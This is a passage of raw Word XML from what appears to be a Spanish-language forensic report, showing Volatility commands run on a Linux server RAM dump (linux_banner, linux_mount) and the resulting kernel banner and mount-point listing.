          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66071F79" w14:textId="77777777" w:rsidR="00CE15AE" w:rsidRPr="00CE15AE" w:rsidRDefault="00CE15AE" w:rsidP="00CE15AE">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE15AE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --profile=LinuxlinuxUbuntu_4_15_0-1021-aws_profilex64 -f '/home/jrodg85/Server_RAM.mem' linux_banner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9E19B2" w14:textId="77777777" w:rsidR="00CE15AE" w:rsidRPr="00C9562B" w:rsidRDefault="00CE15AE" w:rsidP="00CE15AE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354CB701" w14:textId="77777777" w:rsidR="00CE15AE" w:rsidRDefault="00CE15AE" w:rsidP="00CE15AE"/>
    <w:p w14:paraId="5B156639" w14:textId="77777777" w:rsidR="00CE15AE" w:rsidRDefault="00CE15AE" w:rsidP="00CE15AE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>La respuesta de la consola ha sido la siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFF6FC6" w14:textId="77777777" w:rsidR="00CE15AE" w:rsidRDefault="00CE15AE" w:rsidP="00CE15AE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="086FDB52" w14:textId="77777777" w:rsidR="00CE15AE" w:rsidRPr="00C9562B" w:rsidRDefault="00CE15AE" w:rsidP="00CE15AE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E6D466" w14:textId="77777777" w:rsidR="00CE15AE" w:rsidRPr="00CE15AE" w:rsidRDefault="00CE15AE" w:rsidP="00CE15AE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE15AE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Volatility Foundation Volatility Framework 2.6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6F344E" w14:textId="77777777" w:rsidR="00CE15AE" w:rsidRPr="00CE15AE" w:rsidRDefault="00CE15AE" w:rsidP="00CE15AE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E30DE31" w14:textId="77777777" w:rsidR="00CE15AE" w:rsidRPr="00CE15AE" w:rsidRDefault="00CE15AE" w:rsidP="00CE15AE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE15AE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Linux version 4.15.0-1021-aws (buildd@lcy01-amd64-001) (gcc version 7.3.0 (Ubuntu 7.3.0-16ubuntu3)) #21-Ubuntu SMP Tue Aug 28 10:23:07 UTC 2018 (Ubuntu 4.15.0-1021.21-aws 4.15.18)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48933234" w14:textId="77777777" w:rsidR="00CE15AE" w:rsidRPr="00C9562B" w:rsidRDefault="00CE15AE" w:rsidP="00CE15AE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDC8D51" w14:textId="77777777" w:rsidR="00182D42" w:rsidRDefault="00182D42" w:rsidP="00D52A79"/>
    <w:p w14:paraId="6336494C" w14:textId="77777777" w:rsidR="00182D42" w:rsidRDefault="00182D42" w:rsidP="00D52A79"/>
    <w:p w14:paraId="7ECBCCEF" w14:textId="77777777" w:rsidR="00182D42" w:rsidRDefault="00182D42" w:rsidP="00D52A79"/>
    <w:p w14:paraId="723E198F" w14:textId="77777777" w:rsidR="00182D42" w:rsidRDefault="00182D42" w:rsidP="00D52A79"/>
    <w:p w14:paraId="34CE2ADA" w14:textId="3695BF22" w:rsidR="00520AAC" w:rsidRDefault="00520AAC">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D23D11" w14:textId="14E34210" w:rsidR="00520AAC" w:rsidRDefault="00182D42" w:rsidP="00520AAC">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="180" w:name="_Ref155654101"/>
      <w:bookmarkStart w:id="181" w:name="_Toc155782533"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>IX</w:t>
      </w:r>
      <w:r w:rsidR="004C5DDC">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00520AAC">
        <w:t>Comando linux_mount.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="180"/>
      <w:bookmarkEnd w:id="181"/>
    </w:p>
    <w:p w14:paraId="408F6D7A" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00520AAC"/>
    <w:p w14:paraId="5E5BF069" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00C9562B" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0822DB28" w14:textId="7C963754" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00520AAC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --profile=LinuxlinuxUbuntu_4_15_0-1021-aws_profilex64 -f '/home/jrodg85/Server_RAM.mem' linux_mount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3E31A6" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00C9562B" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6192A0" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00520AAC"/>
    <w:p w14:paraId="34353BEC" w14:textId="480E4DDB" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79">
      <w:r w:rsidRPr="00520AAC">
        <w:t>La respuesta de volatility ha sido la siguiente</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D9B674" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79"/>
    <w:p w14:paraId="7B3F4C85" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00C9562B" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A4787F"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Volatility Foundation Volatility Framework 2.6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AF7F73" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44B9140D"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cgroup                    /sys/fs/cgroup/rdma                 cgroup       rw,relatime,nosuid,nodev,noexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B431630" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27B6E34A"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tmpfs                     /sys/fs/cgroup                      tmpfs        ro,nosuid,nodev,noexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3A5C09" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FE98A0F"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/dev/xvda1                /                                   ext4         ro,relatime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D620B30" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0553EA96"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proc                      /bus                                proc         ro,relatime,nosuid,nodev,noexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5B2E2B" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="680711DE"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pstore                    /sys/fs/pstore                      pstore       rw,relatime,nosuid,nodev,noexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7245615D" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AB52651"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fusectl                   /sys/fs/fuse/connections            fusectl      rw,relatime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428BE33E" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B9997FF"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lxcfs                     /var/lib/lxcfs                      fuse         ro,relatime,nosuid,nodev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E68B647" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="322594D1"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/dev/loop0                /snap/core/5328                     squashfs     ro,relatime,nodev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CAD34A" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E18B506"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udev                      /dev                                devtmpfs     rw,relatime,nosuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E5534F" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CB9FD60"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cgroup                    /sys/fs/cgroup/unified              cgroup2      rw,relatime,nosuid,nodev,noexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163A397F" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52BC8D02"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sysfs                     /sys                                sysfs        rw,relatime,nosuid,nodev,noexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267A77B2" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="434EA5B4"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tmpfs                     /run/user/1000                      tmpfs        rw,relatime,nosuid,nodev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B37D384" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67BA42B9"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/dev/loop1                /snap/amazon-ssm-agent/495          squashfs     ro,relatime,nodev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9E8FE4" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3103121E"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tmpfs                     /run                                tmpfs        rw,relatime,nosuid,noexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDADF24" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30AF448A"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devpts                    /dev/pts                            devpts       rw,relatime,nosuid,noexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE54184" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C0F478F"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systemd-1                 /proc/sys/fs/binfmt_misc            autofs       rw,relatime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0139144A" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05CC1E79"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tmpfs                     /dev/shm                            tmpfs        rw,nosuid,nodev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B9B54B" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="296CB919"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cgroup                    /sys/fs/cgroup/net_cls,net_prio     cgroup       rw,relatime,nosuid,nodev,noexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B05CD26" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="389C1AC0"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cgroup                    /sys/fs/cgroup/hugetlb              cgroup       ro,relatime,nosuid,nodev,noexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BAF976" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B01092C"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hugetlbfs                 /dev/hugepages                      hugetlbfs    rw,relatime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C9A6A4" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="200AAA43"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tmpfs                     /dev                                tmpfs        ro,nosuid,noexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54328728" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3177F9ED"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/dev/loop2                /snap/core/6130                     squashfs     ro,relatime,nodev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BBBE41" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="577EB68D"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tmpfs                     /run/lock                           tmpfs        rw,relatime,nosuid,nodev,noexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332E317D" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E2D6254"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/dev/loop3                /snap/amazon-ssm-agent/930          squashfs     ro,relatime,nodev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E21E2CA" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75065B03"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cgroup                    /sys/fs/cgroup/cpuset               cgroup       rw,relatime,nosuid,nodev,noexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDE7735" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="648FDC22"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tmpfs                     /dev                                tmpfs        ro,nosuid,noexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFCE0CF" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69496AF2"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mqueue                    /dev/mqueue                         mqueue       rw,relatime</w:t>
      </w:r>
    </w:p>
